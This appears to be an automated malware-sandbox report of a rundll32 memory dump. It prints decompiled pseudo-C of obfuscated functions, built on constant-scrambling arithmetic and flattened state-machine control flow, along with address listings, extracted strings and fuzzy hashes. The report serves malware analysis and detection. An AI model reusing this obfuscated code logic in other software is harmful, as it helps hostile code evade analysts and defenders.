				 *(_t426 + 0x64) = 0x1e8df6;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
				 *(_t426 + 0x28) = 0xebc79e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
				 *(_t426 + 0x4c) = 0x6795aa;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
				 *(_t426 + 0x50) = 0xbc4be8;
				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
				_t416 = 0x6f;
				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
				 *(_t426 + 0x94) = 0xde468f;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
				 *(_t426 + 0x18) = 0x6e4fa6;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
				 *(_t426 + 0x5c) = 0xc77145;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
				 *(_t426 + 0x44) = 0x492c53;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
				 *(_t426 + 0xa0) = 0x27589;
				_t417 = 0x3e;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
				 *(_t426 + 0x30) = 0xb4bbc8;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
				 *(_t426 + 0x28) = 0xdf5b34;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
				_t418 = 0x5e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
				 *(_t426 + 0x90) = 0xff684d;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
				 *(_t426 + 0x20) = 0x90e304;
				_t419 = 0x7f;
				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
				 *(_t426 + 0x60) = 0xa4eb1a;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
				 *(_t426 + 0x34) = 0xdaab0d;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
				 *(_t426 + 0x68) = 0xbbaf5f;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
				_t372 =  *(_t426 + 0x6c);
				_t411 =  *(_t426 + 0x6c);
				_t424 =  *(_t426 + 0x6c);
				_t420 =  *(_t426 + 0x6c);
				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
				 *(_t426 + 0x74) = 0xfd4b1c;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
				 *(_t426 + 0x88) = 0xbb9d8e;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
				 *(_t426 + 0x3c) = 0x9303e6;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
				 *(_t426 + 0x80) = 0xaf4918;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
				 *(_t426 + 0x78) = 0xd8d1b1;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
				while(1) {
					L1:
					_t347 = 0xfb52c5;
					L2:
					while(_t374 != 0xd963e9) {
						if(_t374 == _t347) {
							_t350 = E0035C264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
							_t426 = _t426 + 0x2c;
							__eflags = _t350;
							if(_t350 == 0) {
								_t351 =  *(_t426 + 0xa0);
							} else {
								_t422 = _t411;
								while(1) {
									__eflags = _t422[1] - 4;
									if(_t422[1] != 4) {
										goto L20;
									}
									L19:
									_t355 = E0034B23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
									_t426 = _t426 + 0x10;
									__eflags = _t355;
									if(_t355 == 0) {
										_t351 = 1;
										 *(_t426 + 0xa0) = 1;
									} else {
										goto L20;
									}
									L25:
									_t420 =  *(_t426 + 0x6c);
									goto L26;
									L20:
									_t353 =  *_t422;
									__eflags = _t353;
									if(_t353 == 0) {
										_t351 =  *(_t426 + 0xa0);
									} else {
										_t422 = _t422 + _t353;
										__eflags = _t422[1] - 4;
										if(_t422[1] != 4) {
											goto L20;
										}
									}
									goto L25;
								}
							}
							L26:
							__eflags = _t351;
							if(__eflags == 0) {
								_t347 = 0xfb52c5;
								_t374 = 0xfb52c5;
								continue;
							} else {
								_t407 =  *0x363e0c; // 0x0
								E0035458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
								_t374 = 0xd963e9;
								goto L1;
							}
							L32:
						} else {
							if(_t374 == 0x247652d) {
								_t360 = E00348F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
								_t372 = _t360;
								_t426 = _t426 + 0x28;
								__eflags = _t360 - 0xffffffff;
								if(__eflags != 0) {
									_t374 = 0x7db0050;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								}
							} else {
								if(_t374 == 0x4334ccc) {
									E0035DA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
									_t364 = E0034B6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
									_t424 = _t364;
									_t426 = _t426 + 0x18;
									_t374 = 0x247652d;
									 *((short*)(_t364 - 2)) = 0;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								} else {
									if(_t374 == 0x7db0050) {
										_t420 = 0x1000;
										_push(_t374);
										_push(_t374);
										 *(_t426 + 0x74) = 0x1000;
										_t411 = E00347FF2(0x1000);
										_t347 = 0xfb52c5;
										__eflags = _t411;
										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
										continue;
									} else {
										if(_t374 == 0xebf23c2) {
											_t374 = 0x4334ccc;
											continue;
										} else {
											if(_t374 != 0xf828486) {
												L30:
												__eflags = _t374 - 0x24bb42a;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E00351E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
											}
										}
									}
								}
							}
						}
						return 0;
						goto L32;
					}
					E00358519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
					_t374 = 0xf828486;
					_t347 = 0xfb52c5;
					goto L30;
				}
			}

0x003481bd
0x003481c7
0x003481cf
0x003481d4
0x003481dc
0x003481e4
0x003481f3
0x003481f8
0x003481fe
0x00348206
0x0034820e
0x00348219
0x00348224
0x0034822f
0x00348237
0x0034823c
0x00348241
0x00348246
0x0034824e
0x0034825b
0x0034825c
0x00348264
0x00348268
0x00348270
0x00348278
0x00348280
0x0034828e
0x00348292
0x0034829a
0x003482a2
0x003482aa
0x003482af
0x003482b7
0x003482c2
0x003482ca
0x003482d5
0x003482dd
0x003482e2
0x003482ea
0x003482f2
0x003482fa
0x00348307
0x0034830b
0x00348313
0x0034831b
0x00348323
0x0034832b
0x00348333
0x00348338
0x00348340
0x00348348
0x00348355
0x00348359
0x00348361
0x00348369
0x00348371
0x00348376
0x0034837e
0x00348386
0x0034838b
0x00348393
0x0034839b
0x003483a8
0x003483ac
0x003483b4
0x003483bc
0x003483c6
0x003483ce
0x003483d6
0x003483de
0x003483e6
0x003483eb
0x003483f3
0x003483fb
0x00348403
0x00348412
0x00348415
0x00348419
0x00348421
0x0034842c
0x00348437
0x00348442
0x0034844a
0x0034844f
0x00348457
0x0034845f
0x00348467
0x0034846f
0x0034847f
0x00348483
0x0034848b
0x00348493
0x0034849b
0x003484a0
0x003484a8
0x003484bb
0x003484be
0x003484c5
0x003484d0
0x003484e0
0x003484e4
0x003484ec
0x003484f4
0x003484fc
0x00348504
0x00348510
0x00348515
0x0034851b
0x00348520
0x00348528
0x00348533
0x0034853e
0x00348549
0x00348555
0x00348558
0x0034855c
0x00348561
0x00348566
0x0034856e
0x00348576
0x00348580
0x00348584
0x0034858c
0x00348594
0x00348599
0x003485a1
0x003485a6
0x003485ae
0x003485b6
0x003485c0
0x003485c4
0x003485c8
0x003485cc
0x003485d0
0x003485d4
0x003485dc
0x003485e4
0x003485ec
0x003485f4
0x00348607
0x0034860e
0x00348619
0x00348621
0x00348626
0x00348633
0x00348637
0x0034863f
0x0034864a
0x00348655
0x00348660
0x0034866d
0x00348671
0x00348679
0x00348679
0x00348679
0x00000000
0x0034867e
0x0034868c
0x00348806
0x0034880b
0x0034880e
0x00348810
0x00348854
0x00348812
0x00348812
0x00348814
0x00348814
0x00348818
0x00000000
0x00000000
0x0034881a
0x00348832
0x00348837
0x0034883a
0x0034883c
0x0034884a
0x0034884b
0x00000000
0x00000000
0x00000000
0x00348864
0x00348864
0x00000000
0x0034883e
0x0034883e
0x00348840
0x00348842
0x0034885d
0x00348844
0x00348844
0x00348814
0x00348818
0x00000000
0x00000000
0x00348818
0x00000000
0x00348842
0x00348814
0x00348868
0x00348868
0x0034886a
0x0034888d
0x00348892
0x00000000
0x0034886c
0x00348870
0x0034887d
0x00348883
0x00000000
0x00348883
0x00000000
0x00348692
0x00348698
0x003487b9
0x003487be
0x003487c0
0x003487c3
0x003487c6
0x003487cc
0x00348679
0x00348679
0x00348679
0x00000000
0x00348679
0x00348679
0x0034869e
0x003486a4
0x0034874a
0x00348765
0x0034876a
0x0034876c
0x00348771
0x00348776
0x00348679
0x00348679
0x00348679
0x00000000
0x00348679
0x003486aa
0x003486b0
0x003486ff
0x0034870e
0x0034870f
0x00348710
0x0034871a
0x0034871c
0x00348722
0x00348729
0x00000000
0x003486b2
0x003486b8
0x003486f4
0x00000000
0x003486ba
0x003486c0
0x003488b2
0x003488b2
0x003488b8
0x00000000
0x00000000
0x003488be
0x003486c6
0x003486dd
0x003486e2
0x003486c0
0x003486b8
0x003486b0
0x003486a4
0x00348698
0x003486f1
0x00000000
0x003486f1
0x003488a2
0x003488a8
0x003488ad
0x00000000
0x003488ad

Strings

Lz, xrefs: 003481FE
N'`, xrefs: 003481DC
/&X, xrefs: 00348457
Q, xrefs: 003484EC
q_, xrefs: 0034820E
S,I, xrefs: 0034848B
Ze, xrefs: 0034864A

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
API String ID: 0-1837206032
Opcode ID: 2e65a3c1723aaaba6616959a3bff19b00141a950352a80425bd1b7641f90271d
Instruction ID: aea530ebe84342704a636f40cda131679b4ba827ea6773e6bf63b47e9de076d4
Opcode Fuzzy Hash: 2e65a3c1723aaaba6616959a3bff19b00141a950352a80425bd1b7641f90271d
Instruction Fuzzy Hash: E50231711083809FD369CF25C489A5FBBE1FBC4758F508A1DF69A8A260DBB49949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0034E5CF Relevance: 9.0, Strings: 7, Instructions: 204
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0034E5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t170;
				void* _t181;
				void* _t184;
				void* _t189;
				void* _t192;
				void* _t195;
				void* _t197;
				void* _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int* _t226;

				_push(_a8);
				_t219 = _a4;
				_t195 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t170);
				_v56 = 0xa4c651;
				_t226 =  &(( &_v116)[4]);
				_v56 = _v56 ^ 0x6a6d8bac;
				_v56 = _v56 ^ 0x6ac6bd64;
				_t220 = 0;
				_v60 = 0xbac055;
				_t197 = 0xf39239f;
				_v60 = _v60 << 0xd;
				_v60 = _v60 ^ 0x580542e6;
				_v108 = 0xd580f5;
				_v108 = _v108 ^ 0x97cdda0d;
				_v108 = _v108 + 0x37dd;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 ^ 0x00021113;
				_v52 = 0xf28435;
				_v52 = _v52 | 0x057a1a90;
				_v52 = _v52 ^ 0x05fdc129;
				_v80 = 0x5c8bc8;
				_t221 = 0x27;
				_v80 = _v80 / _t221;
				_t222 = 0x1b;
				_v80 = _v80 * 9;
				_v80 = _v80 ^ 0x0013f028;
				_v96 = 0x281d9a;
				_v96 = _v96 + 0xffff8f77;
				_v96 = _v96 + 0x4719;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xfa152b1c;
				_v112 = 0x7415d8;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 + 0xfffff76c;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000d779a;
				_v88 = 0xb68707;
				_v88 = _v88 ^ 0x45e0ecf4;
				_v88 = _v88 + 0xffff71c0;
				_v88 = _v88 ^ 0x455519c2;
				_v116 = 0xceabf6;
				_v116 = _v116 + 0x1225;
				_v116 = _v116 / _t222;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x0006e3bb;
				_v84 = 0xd525a4;
				_v84 = _v84 + 0xffff1243;
				_v84 = _v84 + 0x1c30;
				_v84 = _v84 ^ 0x00df7efc;
				_v100 = 0xf29ecf;
				_v100 = _v100 << 0xc;
				_v100 = _v100 + 0xffff4e95;
				_v100 = _v100 ^ 0x70d6065d;
				_v100 = _v100 ^ 0x593d89f0;
				_v104 = 0x2206c6;
				_v104 = _v104 | 0x38687435;
				_v104 = _v104 ^ 0xadcf411b;
				_v104 = _v104 ^ 0x9549ac77;
				_v104 = _v104 ^ 0x00e3f730;
				_v92 = 0xd38a43;
				_v92 = _v92 >> 3;
				_v92 = _v92 + 0x6fd1;
				_v92 = _v92 ^ 0x0012c73c;
				_v64 = 0x625266;
				_v64 = _v64 + 0x2436;
				_v64 = _v64 ^ 0x006987c3;
				_v68 = 0xe296bd;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x52d9a139;
				_v72 = 0x54a2fd;
				_v72 = _v72 << 0xd;
				_v72 = _v72 >> 0xa;
				_v72 = _v72 ^ 0x002b3e4c;
				_v76 = 0x32cdcd;
				_v76 = _v76 << 0xb;
				_t223 = 0x32;
				_v76 = _v76 / _t223;
				_v76 = _v76 ^ 0x0302c408;
				_v48 = 0x2d2164;
				_v48 = _v48 + 0xfffff0e0;
				_v48 = _v48 ^ 0x0021ab5a;
				do {
					while(_t197 != 0x2168849) {
						if(_t197 == 0x29fa3de) {
							_t184 = E00342A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
							_t226 =  &(_t226[3]);
							__eflags = _t184;
							if(__eflags != 0) {
								_t197 = 0x74ac459;
								continue;
							}
						} else {
							if(_t197 == 0x545de14) {
								E00343DBC( &_v44, _t195, _v56, _v60, _v108);
								_t226 =  &(_t226[3]);
								_t197 = 0x2168849;
								continue;
							} else {
								if(_t197 == 0x6ab10c5) {
									_t189 = E00342A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
									_t226 =  &(_t226[3]);
									__eflags = _t189;
									if(__eflags != 0) {
										_t197 = 0x29fa3de;
										continue;
									}
								} else {
									if(_t197 == 0x74ac459) {
										_t192 = E00342A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
										_t226 =  &(_t226[3]);
										__eflags = _t192;
										if(__eflags != 0) {
											_t197 = 0x9dbfb8a;
											continue;
										}
									} else {
										if(_t197 == 0x9dbfb8a) {
											__eflags = E0035D97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
											_t220 =  !=  ? 1 : _t220;
											__eflags = _t220;
										} else {
											if(_t197 != 0xf39239f) {
												goto L19;
											} else {
												_t197 = 0x545de14;
												continue;
											}
										}
									}
								}
							}
						}
						L22:
						return _t220;
					}
					_t181 = E00342A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
					_t226 =  &(_t226[3]);
					__eflags = _t181;
					if(__eflags == 0) {
						_t197 = 0x90a774d;
						goto L19;
					} else {
						_t197 = 0x6ab10c5;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t197 - 0x90a774d;
				} while (__eflags != 0);
				goto L22;
			}

0x0034e5d6
0x0034e5dd
0x0034e5e4
0x0034e5e6
0x0034e5e7
0x0034e5e8
0x0034e5e9
0x0034e5ee
0x0034e5f6
0x0034e5f9
0x0034e603
0x0034e60b
0x0034e60d
0x0034e615
0x0034e61a
0x0034e61f
0x0034e627
0x0034e62f
0x0034e637
0x0034e63f
0x0034e644
0x0034e64c
0x0034e654
0x0034e65c
0x0034e664
0x0034e672
0x0034e677
0x0034e682
0x0034e683
0x0034e687
0x0034e68f
0x0034e697
0x0034e69f
0x0034e6a7
0x0034e6ac
0x0034e6b4
0x0034e6bc
0x0034e6c1
0x0034e6c9
0x0034e6ce
0x0034e6d6
0x0034e6de
0x0034e6e6
0x0034e6ee
0x0034e6f6
0x0034e6fe
0x0034e70c
0x0034e710
0x0034e715
0x0034e71d
0x0034e725
0x0034e72d
0x0034e735
0x0034e73d
0x0034e745
0x0034e74a
0x0034e752
0x0034e75a
0x0034e762
0x0034e76a
0x0034e772
0x0034e77a
0x0034e782
0x0034e78a
0x0034e792
0x0034e797
0x0034e79f
0x0034e7a7
0x0034e7af
0x0034e7b9
0x0034e7c1
0x0034e7c9
0x0034e7ce
0x0034e7d6
0x0034e7de
0x0034e7e3
0x0034e7e8
0x0034e7f0
0x0034e7f8
0x0034e803
0x0034e80b
0x0034e80f
0x0034e817
0x0034e81f
0x0034e827
0x0034e82f
0x0034e82f
0x0034e83d
0x0034e90f
0x0034e914
0x0034e917
0x0034e919
0x0034e91b
0x00000000
0x0034e91b
0x0034e843
0x0034e849
0x0034e8e8
0x0034e8ed
0x0034e8f0
0x00000000
0x0034e84f
0x0034e855
0x0034e8bf
0x0034e8c4
0x0034e8c7
0x0034e8c9
0x0034e8cf
0x00000000
0x0034e8cf
0x0034e857
0x0034e85d
0x0034e893
0x0034e898
0x0034e89b
0x0034e89d
0x0034e8a3
0x00000000
0x0034e8a3
0x0034e85f
0x0034e865
0x0034e982
0x0034e984
0x0034e984
0x0034e86b
0x0034e871
0x00000000
0x0034e877
0x0034e877
0x00000000
0x0034e877
0x0034e871
0x0034e865
0x0034e85d
0x0034e855
0x0034e849
0x0034e988
0x0034e990
0x0034e990
0x0034e93a
0x0034e93f
0x0034e942
0x0034e944
0x0034e950
0x00000000
0x0034e946
0x0034e946
0x00000000
0x0034e946
0x00000000
0x0034e955
0x0034e955
0x0034e955
0x00000000

Strings

6$, xrefs: 0034E7AF
d!-, xrefs: 0034E817
Mw, xrefs: 0034E950
5th8, xrefs: 0034E76A
fRb, xrefs: 0034E7A7
Mw, xrefs: 0034E955
L>+, xrefs: 0034E7E8

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5th8$6$$L>+$Mw$Mw$d!-$fRb
API String ID: 0-2045295228
Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
Instruction ID: 4d170f47faf3fe97b3936c437a770da7197875f14c8ede7872bcb9007bc653f6
Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
Instruction Fuzzy Hash: DF9185B25083419BC795CE61C88941BFBF5FBC4758F004A1DF5829A260D7B1EA19CF93

Uniqueness

Uniqueness Score: -1.00%

Function 0034E2CC Relevance: 8.9, Strings: 7, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0034E2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				intOrPtr _v576;
				char _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				void* __ecx;
				void* _t136;
				void* _t151;
				signed int _t153;
				signed int _t156;
				void* _t162;
				signed int _t167;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t187 = _a8;
				_push(_t187);
				_push(E00348E4D);
				_push(__edx);
				E003520B9(_t136);
				_v608 = 0x1ac257;
				_t196 =  &(( &_v652)[5]);
				_v608 = _v608 ^ 0x78a3296c;
				_v608 = _v608 ^ 0x78b9eb39;
				_t162 = 0xac58df2;
				_v624 = 0x387e66;
				_t9 =  &_v624; // 0x387e66
				_t188 = 0x2e;
				_v624 =  *_t9 * 0x13;
				_v624 = _v624 / _t188;
				_v624 = _v624 ^ 0x001972d5;
				_v644 = 0x433552;
				_v644 = _v644 + 0xffffa6b6;
				_v644 = _v644 ^ 0x94defa20;
				_v644 = _v644 << 1;
				_v644 = _v644 ^ 0x293db944;
				_v652 = 0xb70b59;
				_v652 = _v652 << 0xb;
				_v652 = _v652 + 0xffff8138;
				_t189 = 0x15;
				_v652 = _v652 / _t189;
				_v652 = _v652 ^ 0x08c5a62f;
				_v616 = 0xf4782f;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 + 0xffff066a;
				_v616 = _v616 ^ 0xfff8c7bc;
				_v604 = 0x656560;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x0000606f;
				_v648 = 0x377d9b;
				_t190 = 0x7f;
				_v648 = _v648 / _t190;
				_v648 = _v648 + 0xfd7f;
				_v648 = _v648 + 0xffff6b0a;
				_v648 = _v648 ^ 0x00006649;
				_v636 = 0x80cedd;
				_t191 = 0x58;
				_v636 = _v636 / _t191;
				_v636 = _v636 + 0x515e;
				_v636 = _v636 ^ 0x000b92de;
				_v620 = 0x65d9bd;
				_v620 = _v620 + 0xffff4b50;
				_v620 = _v620 ^ 0xd34cfccc;
				_v620 = _v620 ^ 0xd32e4bd2;
				_v632 = 0xb89e86;
				_v632 = _v632 + 0xffffcc79;
				_t192 = 0x2f;
				_v632 = _v632 / _t192;
				_v632 = _v632 ^ 0x00046a67;
				_v628 = 0xbb1c4a;
				_v628 = _v628 >> 6;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x000a4ee8;
				_v640 = 0xfd7114;
				_v640 = _v640 << 5;
				_v640 = _v640 * 0x45;
				_v640 = _v640 + 0xa2ea;
				_v640 = _v640 ^ 0x89e0c310;
				_v612 = 0x26e293;
				_v612 = _v612 >> 0xd;
				_v612 = _v612 ^ 0x00050986;
				_t193 = _v612;
				do {
					while(_t162 != 0x249e110) {
						if(_t162 == 0x48c9d54) {
							_v556 = 0x22c;
							_t153 = E0035C15D(_t193, _v652, _v616,  &_v556, _v604);
							_t196 =  &(_t196[3]);
							asm("sbb ecx, ecx");
							_t167 =  ~_t153 & 0xf758a92f;
							L13:
							_t162 = _t167 + 0xe63f1a5;
							continue;
						}
						if(_t162 == 0x5bc9ad4) {
							_t156 = E00348E4D( &_v556,  &_v600);
							asm("sbb ecx, ecx");
							_t167 =  ~_t156 & 0xf3e5ef6b;
							goto L13;
						}
						if(_t162 == 0xac58df2) {
							_v576 = _t187;
							_t162 = 0xcf1a497;
							continue;
						}
						if(_t162 != 0xcf1a497) {
							if(_t162 == 0xe63f1a5) {
								return E00351E67(_v632, _v628, _v640, _v612, _t193);
							}
							goto L18;
						}
						_push(_t162);
						_t156 = E00345988(_t162, _v608);
						_t193 = _t156;
						if(_t156 != 0xffffffff) {
							_t162 = 0x48c9d54;
							continue;
						}
						L8:
						return _t156;
					}
					_t151 = E00342A58(_v648, _t193,  &_v556, _v636, _v620);
					_t196 =  &(_t196[3]);
					if(_t151 == 0) {
						_t162 = 0xe63f1a5;
						goto L18;
					} else {
						_t162 = 0x5bc9ad4;
						continue;
					}
					goto L8;
					L18:
				} while (_t162 != 0xad68edc);
				return _t156;
			}

0x0034e2d6
0x0034e2dd
0x0034e2e4
0x0034e2e5
0x0034e2ea
0x0034e2ec
0x0034e2f1
0x0034e2f9
0x0034e2fc
0x0034e306
0x0034e30e
0x0034e313
0x0034e31b
0x0034e322
0x0034e325
0x0034e331
0x0034e335
0x0034e33d
0x0034e345
0x0034e34d
0x0034e355
0x0034e359
0x0034e361
0x0034e369
0x0034e36e
0x0034e37a
0x0034e37f
0x0034e385
0x0034e38d
0x0034e395
0x0034e39a
0x0034e3a2
0x0034e3aa
0x0034e3b2
0x0034e3b7
0x0034e3bf
0x0034e3cb
0x0034e3d0
0x0034e3d6
0x0034e3de
0x0034e3e6
0x0034e3ee
0x0034e3fa
0x0034e3ff
0x0034e405
0x0034e40d
0x0034e415
0x0034e41d
0x0034e425
0x0034e42d
0x0034e435
0x0034e43d
0x0034e449
0x0034e44c
0x0034e450
0x0034e458
0x0034e460
0x0034e46a
0x0034e474
0x0034e47c
0x0034e484
0x0034e48e
0x0034e492
0x0034e49a
0x0034e4a2
0x0034e4aa
0x0034e4af
0x0034e4b7
0x0034e4bb
0x0034e4bb
0x0034e4c9
0x0034e56a
0x0034e57d
0x0034e582
0x0034e589
0x0034e58b
0x0034e55b
0x0034e55b
0x00000000
0x0034e55b
0x0034e4d5
0x0034e54a
0x0034e553
0x0034e555
0x00000000
0x0034e555
0x0034e4dd
0x0034e532
0x0034e536
0x00000000
0x0034e536
0x0034e4e5
0x0034e4e9
0x00000000
0x0034e505
0x00000000
0x0034e4e9
0x0034e51b
